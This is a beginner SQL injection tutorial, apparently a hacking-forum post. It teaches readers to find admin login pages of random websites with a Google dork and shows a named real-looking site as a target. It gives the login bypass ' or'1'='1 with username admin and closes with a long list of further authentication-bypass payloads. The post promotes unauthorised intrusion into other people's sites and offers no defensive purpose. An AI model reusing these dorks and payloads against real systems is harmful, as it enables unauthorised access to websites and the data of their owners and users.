Basic SQL Injection Tutorial [For beginners]


:angry: Basic SQL Injection Tutorial :angry:


Hi everyone.
Here we are going to cover the very basic chapters of SQL Injection.We will be learning through examples...real examples.:devilish:
This thread is meant for only N00bs or beginners.Or anyone who is interested in hacking and havnt got a touch in sqli.

So...let us start.As you know sql is a very famous database management language that is used widely these days.It is used for many good purposes.But errors in the construction of sql databases lead to vulnerabilities and allowing hackers to get access to sites.

Here am gonna show you how to hack into admin panel of a sqli vulnerable website or how to bypass the admin password.
Here we are going to hack random sites.So first to find the sites,use this dork.
Quote:inurl:adminlogin.asp
Just copy and paste this in google's search bar and hit search.Then you'll be getting lots of links to admin panels of many websites.
Select any link you like.Well..i selected this
Quote:http://csimatrichss.org/adminlogin.asp
As you can see,the page will prompt for username and password.:tongue:
Dont worry Unsure try this
Quote:Username : admin
Password : ' or'1'='1
Yeah..that's it.You'll be inside as soon as you hit enter. :)
Like this,same method can be used to hack other sites too.Here i used this string ' or'1'='1.
Keep in mind,the username is always admin and in the password field, use the string that i mentioned above.That string will work in most of the cases.But am providing some more.Use these if the string i mentioned above wont work.
Quote:admin'--

'or''='

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a